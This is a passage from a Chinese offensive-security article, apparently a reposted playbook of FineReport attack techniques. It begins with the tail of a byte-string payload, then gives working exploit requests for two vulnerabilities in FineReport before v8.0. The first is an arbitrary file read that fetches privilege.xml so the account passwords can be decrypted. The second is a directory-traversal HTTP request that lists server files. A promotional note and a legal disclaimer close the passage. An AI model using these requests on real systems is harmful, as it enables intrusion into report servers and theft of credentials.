\xcf\x01\x9bv\x9c\x00\xd9^\xe0N\x9bO\x01\xcb\xfc+r\xc7I\xf4&0\x81\xa9UhD\xe3\x7d \xc4v\x9cC\x9c\xa4\xb6\x1c\x10oB\x1d\xb5\x8aO@!\x13\xe1\xf3\xb3x;\x9b\x02\xc5\x8f\x80\x00\x85R\x03\xaa\xb3\x1e\x82[\xf6YNv\x9f\x80<\x8b\x86\x10\xff\x8c\x17\xe0\xdf\xf4X\xb3\x9c5+\xf2\xff\x03\xb78\x18\xa0\xbd\x1c\x00\x00")}}

5. 帆软报表 V8 get_geo_json 任意文件读取漏洞

FineReport < v8.0

WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

获得账号密码后进行解密。

6. 帆软报表 V8 fs_remote_design目录遍历漏洞

FineReport < v8.0

GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Length: 230

7. dd2扫描输出

个人实战小圈子，欢迎感兴趣的师傅们加入，关注公众号回复：”dddd”获取联系方式，无意勿扰哈，谢谢师傅们。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术安全艺术安全艺术《攻防实战 | 帆软报表FineReport打法合集》